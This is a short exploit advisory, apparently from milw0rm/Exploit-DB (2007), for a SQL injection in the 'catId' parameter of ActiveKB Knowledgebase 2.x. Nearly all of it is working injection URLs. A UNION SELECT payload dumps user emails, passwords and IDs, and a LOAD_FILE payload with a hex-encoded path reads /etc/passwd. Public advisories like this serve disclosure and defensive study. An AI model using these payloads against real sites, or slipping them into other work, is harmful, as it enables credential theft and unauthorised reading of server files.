ActiveKB KnowledgeBase 2.x - 'catId' SQL Injection

EDB-ID:

4459


Platform:

PHP

Published:

2007-09-26

 ActiveKB NX 2.? ( Powered by ActiveKB Knowledgebase Software)  (index.php) SQL Injection

                              Discovered by Luna-Tic and XTErner 19 Years Ukrainian Hackers 

Vendor:www.interspire.com/activekb/

License:sharewere

Exploit:/kb/index.php?ToDo=browse&catId=[SQL CODE]
http://www.xxx.net/kb/index.html?ToDo=browse&catId=-20+union+select+1,concat(email,0x3a,password,0x3a,userid),3,4,5,6,7+from+user--
https://www.xxx.com/faq/index.php?ToDo=browse&catId=-10+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7+members/*

# milw0rm.com [2007-09-26]